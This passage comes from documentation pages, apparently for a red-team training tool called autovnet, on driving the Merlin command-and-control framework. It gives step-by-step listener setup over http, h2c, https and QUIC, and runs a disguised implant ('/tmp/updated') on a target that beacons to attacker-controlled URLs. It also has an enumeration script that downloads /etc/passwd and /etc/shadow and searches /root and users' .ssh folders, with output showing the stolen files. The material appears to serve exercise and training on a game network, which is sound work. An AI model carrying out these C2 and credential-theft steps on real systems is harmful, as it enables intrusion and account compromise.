<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Results<span class="w"> </span>job<span class="w"> </span>iGUMhrsbBX<span class="w"> </span><span class="k">for</span><span class="w"> </span>agent<span class="w"> </span>09b3c223-f371-42e2-8a2d-a24785e3647f<span class="w"> </span>at<span class="w"> </span><span class="m">2022</span>-07-17T17:14:53Z

<span class="o">[</span>+<span class="o">]</span><span class="w">  </span><span class="m">13</span>:14:20<span class="w"> </span>up<span class="w">  </span><span class="m">4</span>:43,<span class="w">  </span><span class="m">2</span><span class="w"> </span>users,<span class="w">  </span>load<span class="w"> </span>average:<span class="w"> </span><span class="m">0</span>.04,<span class="w"> </span><span class="m">0</span>.05,<span class="w"> </span><span class="m">0</span>.04
USER<span class="w">     </span>TTY<span class="w">      </span>FROM<span class="w">             </span>LOGIN@<span class="w">   </span>IDLE<span class="w">   </span>JCPU<span class="w">   </span>PCPU<span class="w"> </span>WHAT
target<span class="w">   </span>pts/0<span class="w">    </span><span class="m">248</span>.69.21.233<span class="w">    </span><span class="m">13</span>:04<span class="w">    </span><span class="m">7</span>:32<span class="w">   </span><span class="m">0</span>.03s<span class="w">  </span><span class="m">0</span>.03s<span class="w"> </span>sshd:<span class="w"> </span>target<span class="w"> </span><span class="o">[</span>priv<span class="o">]</span><span class="w"> </span>
target<span class="w">   </span>pts/1<span class="w">    </span><span class="m">248</span>.69.21.233<span class="w">    </span><span class="m">13</span>:06<span class="w">    </span><span class="m">6</span>:20<span class="w">   </span><span class="m">8</span>.45s<span class="w">  </span><span class="m">0</span>.02s<span class="w"> </span>sudo<span class="w"> </span>-i
</code></pre></div></p>
<p>Note that <code>merlin</code> <code>server</code> claims the files where written to <code>/opt/merlin/data/agents/...</code>.
That corresponds to <code>/opt/rtfm/merlin/CODENAME/data/agents/...</code> outside the container.</p>
<p>On you Kali system:
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>ls<span class="w"> </span>-alh<span class="w"> </span>/opt/rtfm/merlin/draconian_concern/data/agents/09b3c223-f371-42e2-8a2d-a24785e3647f
total<span class="w"> </span>20K
drwxr-x---<span class="w"> </span><span class="m">2</span><span class="w"> </span>...<span class="w"> </span><span class="m">4</span>.0K<span class="w"> </span>Jul<span class="w"> </span><span class="m">17</span><span class="w"> </span><span class="m">13</span>:14<span class="w"> </span>.
drwxr-x---<span class="w"> </span><span class="m">3</span><span class="w"> </span>...<span class="w"> </span><span class="m">4</span>.0K<span class="w"> </span>Jul<span class="w"> </span><span class="m">17</span><span class="w"> </span><span class="m">13</span>:07<span class="w"> </span>..
-rw-------<span class="w"> </span><span class="m">1</span><span class="w"> </span>...<span class="w"> </span><span class="m">2</span>.3K<span class="w"> </span>Jul<span class="w"> </span><span class="m">17</span><span class="w"> </span><span class="m">13</span>:14<span class="w"> </span>agent_log.txt
-rw-------<span class="w"> </span><span class="m">1</span><span class="w"> </span>...<span class="w"> </span><span class="m">2</span>.9K<span class="w"> </span>Jul<span class="w"> </span><span class="m">17</span><span class="w"> </span><span class="m">13</span>:14<span class="w"> </span>passwd
-rw-------<span class="w"> </span><span class="m">1</span><span class="w"> </span>...<span class="w"> </span><span class="m">1</span>.6K<span class="w"> </span>Jul<span class="w"> </span><span class="m">17</span><span class="w"> </span><span class="m">13</span>:14<span class="w"> </span>shadow
</code></pre></div></p>
<h3 id="recap">Recap<a class="headerlink" href="#recap" title="Permanent link">&para;</a></h3>
<p>In this simple example, we have have created a simple attack chain with actually interesting associated IoCs:</p>
<ul>
<li>Log in (SSH) from <code>248.69.21.233</code></li>
<li>Download payload (HTTPS) from <code>fumbling.brick.avn</code> / <code>254.192.198.110</code></li>
<li>Agent beacons (HTTP/2) to <code>boorish.line.avn</code> / <code>248.143.94.234</code></li>
</ul>
<h2 id="http">http<a class="headerlink" href="#http" title="Permanent link">&para;</a></h2>
<p>See <a href="#http2">http2</a> for a more detailed, end-to-end example.
This assumes your <code>merlin</code> <code>server</code> already running and an agent ready to execute.</p>
<h3 id="start-listener">Start Listener<a class="headerlink" href="#start-listener" title="Permanent link">&para;</a></h3>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>listener<span class="w"> </span>draconian_concern<span class="w"> </span>-P<span class="w"> </span>http
...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>http<span class="w"> </span>-url<span class="w"> </span>http://243.97.157.58
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>http<span class="w"> </span>-url<span class="w"> </span>http://faithful.literature.avn
...
</code></pre></div>
<h3 id="start-new-agent">Start New Agent<a class="headerlink" href="#start-new-agent" title="Permanent link">&para;</a></h3>
<p>(On target)
<div class="highlight"><pre><span></span><code>/tmp/updated<span class="w"> </span>-proto<span class="w"> </span>http<span class="w"> </span>-url<span class="w"> </span>http://faithful.literature.avn
</code></pre></div>
The server should get a check-in.</p>
<h2 id="h2c">h2c<a class="headerlink" href="#h2c" title="Permanent link">&para;</a></h2>
<p>See <a href="#http2">http2</a> for a more detailed, end-to-end example.
This assumes your <code>merlin</code> <code>server</code> already running and an agent ready to execute.</p>
<h3 id="start-listener_1">Start Listener<a class="headerlink" href="#start-listener_1" title="Permanent link">&para;</a></h3>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>listener<span class="w"> </span>draconian_concern<span class="w"> </span>-P<span class="w"> </span>h2c
...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>h2c<span class="w"> </span>-url<span class="w"> </span>http://254.128.68.186
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>h2c<span class="w"> </span>-url<span class="w"> </span>http://uneven.repair.avn
...
</code></pre></div>
<h3 id="start-new-agent_1">Start New Agent<a class="headerlink" href="#start-new-agent_1" title="Permanent link">&para;</a></h3>
<p>(On target)
<div class="highlight"><pre><span></span><code>/tmp/updated<span class="w"> </span>-proto<span class="w"> </span>h2c<span class="w"> </span>-url<span class="w"> </span>http://uneven.repair.avn
</code></pre></div>
The server should get a check-in.</p>
<h2 id="https">https<a class="headerlink" href="#https" title="Permanent link">&para;</a></h2>
<p>See <a href="#http2">http2</a> for a more detailed, end-to-end example.
This assumes your <code>merlin</code> <code>server</code> already running and an agent ready to execute.</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>listener<span class="w"> </span>draconian_concern<span class="w"> </span>-P<span class="w"> </span>https
...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>https<span class="w"> </span>-url<span class="w"> </span>https://245.208.57.55
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>https<span class="w"> </span>-url<span class="w"> </span>https://coordinated.reality.avn
...
</code></pre></div>
<h3 id="start-new-agent_2">Start New Agent<a class="headerlink" href="#start-new-agent_2" title="Permanent link">&para;</a></h3>
<p>(On target)
<div class="highlight"><pre><span></span><code>/tmp/updated<span class="w"> </span>-proto<span class="w"> </span>https<span class="w"> </span>-url<span class="w"> </span>https://coordinated.reality.avn
</code></pre></div>
The server should get a check-in.</p>
<h2 id="http3-quic">http3 (QUIC)<a class="headerlink" href="#http3-quic" title="Permanent link">&para;</a></h2>
<p>⚠  <strong><code>http3</code> is not like the other protocols and requires a bit more effort to use.</strong> ⚠</p>
<p>Why? <a href="https://www.chromium.org/quic/">QUIC is a UDP protocol</a>.
<code>autovnet</code>'s <a href="../../rdn/listen/">listen</a> feature only works with <code>TCP</code> (because it's based on <code>SSH</code> tunnels).</p>
<p>Thankfully, <code>autovnet</code>'s <a href="../../rdn/tun/">tun</a> feature supports <code>UDP</code> (and just about anything else).</p>
<p>If you want to use <code>merlin</code> with <code>http3</code>, you must set up a <a href="../../rdn/tun/">tun</a>.</p>
<ul>
<li>Because a <code>tun</code> makes any "public" (bound to <code>0.0.0.0</code>) services accessible to the game network, use with caution</li>
<li><code>tun</code> provides IP remapping, not port remapping. So the port you bind to on your host is the port the target will see.</li>
<li><code>:443</code> is the default and recommended, but be aware this will conflict with any other services bound to <code>:443</code> locally</li>
</ul>
<p>Both the <code>agent</code> and <code>server</code> may generate a warning like</p>
<blockquote>
<p>... failed to sufficiently increase receive buffer size ...</p>
</blockquote>
<p>This is fine, just ignore it.</p>
<h3 id="start-listener_2">Start Listener<a class="headerlink" href="#start-listener_2" title="Permanent link">&para;</a></h3>
<p>The output for <code>http3</code> is different, because it is special
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>listener<span class="w"> </span>draconian_concern<span class="w"> </span>-P<span class="w"> </span>http3
...
<span class="o">[</span>!<span class="o">]</span><span class="w"> </span>http3<span class="w"> </span>is<span class="w"> </span>UDP<span class="w"> </span>-<span class="w"> </span>expose:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>tun<span class="w"> </span>up
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>agent<span class="w"> </span>-proto<span class="w"> </span>http3<span class="w"> </span>-url<span class="w"> </span>https://MAP_IP
...
</code></pre></div></p>
<p>As indicated, we need to start a <code>tun</code> (if we don't have one already) so we can expose this UDP listener to the game network.</p>
<h3 id="start-tun">Start Tun<a class="headerlink" href="#start-tun" title="Permanent link">&para;</a></h3>
<p>See <a href="../../rdn/tun/">tun</a> for more details.</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>tun<span class="w"> </span>up<span class="w"> </span>-R
...
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>map_ip:<span class="w"> </span><span class="m">243</span>.79.112.71
stale.attempt.avn:243.79.112.71
<span class="o">[</span>&gt;<span class="o">]</span><span class="w"> </span>Roll<span class="w"> </span>new<span class="w"> </span>IP?
<span class="w"> </span><span class="o">[</span>y/N<span class="o">]</span>:
</code></pre></div>
<p>The <code>map_ip</code> is the "public" IP that that the agent should call back to.</p>
<p>Obviously, if you choose to roll your IP / DNS name, the old one will stop working,
meaning that your <code>agent</code> will not longer be able to reach your <code>server</code>.</p>
<p>So only roll if you want to change your IoCs and are able to restart / redeploy new agents.</p>
<h3 id="start-new-agent_3">Start New Agent<a class="headerlink" href="#start-new-agent_3" title="Permanent link">&para;</a></h3>
<p>(On target)</p>
<p>Note we need to use the <code>map_ip</code> (or DNS name) generated by the <code>tun</code>.
<div class="highlight"><pre><span></span><code>/tmp/updated<span class="w"> </span>-proto<span class="w"> </span>http3<span class="w"> </span>-url<span class="w"> </span>https://stale.attempt.avn
</code></pre></div>
The server should get a check-in.</p>
<h2 id="scripting">scripting<a class="headerlink" href="#scripting" title="Permanent link">&para;</a></h2>
<p><a href="https://merlin-c2.readthedocs.io/en/latest/">merlin</a> does not appear to natively support scripting.</p>
<p><code>autovnet</code> includes a hacky version of <code>merlin</code> scripting, based on the same technique it uses to set up listeners for you.</p>
<ul>
<li>There are serious limitations to this approach (no way to detect errors, your current menu context changes what commands are valid, etc.)</li>
<li>This technique should hopefully work on most normal Linux desktops / shell setups, but if you are using something weird (non-standard TTY setup), then YMMV</li>
</ul>
<p>To further frustrate scripting, <code>merlin</code> does not seem to execute queued jobs in order, so use caution if trying to queue related commands together.</p>
<p>There is also no obvious way to reliably introduce a delay between commands. (e.g. run a <code>shell</code> command that creates a file, wait X seconds, then <code>download</code> it).</p>
<p>Still, some scripting is better that none.</p>
<h3 id="example">Example<a class="headerlink" href="#example" title="Permanent link">&para;</a></h3>
<p>Here is a simple example of using the rudimentary <code>merlin</code> scripting added by <code>autovnet</code>.</p>
<p>This command will create a file (<code>/tmp/merlin-enum.rc</code>) that is a sequence of (currently) valid <code>merlin</code> commands that do some basic enumeration.
<div class="highlight"><pre><span></span><code>cat<span class="w"> </span><span class="s">&lt;&lt; EOF &gt; /tmp/merlin-enum.rc</span>
<span class="s">sleep 1s</span>
<span class="s">download /etc/passwd</span>
<span class="s">download /etc/shadow</span>
<span class="s">shell w</span>
<span class="s">shell lastlog</span>
<span class="s">shell cat /etc/*-release</span>
<span class="s">shell ps -elfww --forest</span>
<span class="s">shell find /etc</span>
<span class="s">shell find /root</span>
<span class="s">shell find /home/*/.ssh/</span>
<span class="s">sleep 30s</span>
<span class="s">EOF</span>
</code></pre></div></p>
<p>Note that the <code>autovnet merlin script</code> command is context-dependant: the currently state of your <code>merlin server</code> (what menu you are looking at) matters.</p>
<p>These commands are only valid in the <code>agent</code> menu.</p>
<p>In the <code>merlin</code> server, interact with an <code>agent</code> (Linux)
<div class="highlight"><pre><span></span><code>Merlin»<span class="w"> </span>interact<span class="w"> </span>103ab5c6-46ec-4aca-8b39-8ea9990d9678<span class="w"> </span>
Merlin<span class="o">[</span>agent<span class="o">][</span>103ab5c6-46ec-4aca-8b39-8ea9990d9678<span class="o">]</span>»
</code></pre></div></p>
<p>Now, we can throw a script at the server, and queue multiple commands for the agent</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>merlin<span class="w"> </span>script<span class="w"> </span>draconian_concern<span class="w"> </span>/tmp/merlin-enum.rc
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>type:<span class="w"> </span>/tmp/merlin-enum.rc<span class="w"> </span>-&gt;<span class="w"> </span>/opt/rtfm/merlin/draconian_concern/type
</code></pre></div>
<p>All the commands are typed into the merlin server.</p>
<p>Eventually, the agent will complete them all, and return a massive amount of output.</p>
<p>The output can be viewed in more detail in <code>/opt/rtfm/merlin/draconian_concern/data/agents/&lt;AGENT_ID&gt;/agent_log.txt</code></p>





                
              </article>
            </div>
          
          
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12Z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": "../../..", "features": ["search.suggest", "search.highlight", "navigation.instant", "navigation.tracking", "navigation.tabs", "navigation.tabs.sticky", "navigation.top", "navigation.expand", "toc.integrate", "toc.follow", "navigation.top", "content.code.copy"], "search": "../../../assets/javascripts/workers/search.f886a092.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="../../../assets/javascripts/bundle.aecac24b.min.js"></script>
      
    
  </body>
</html>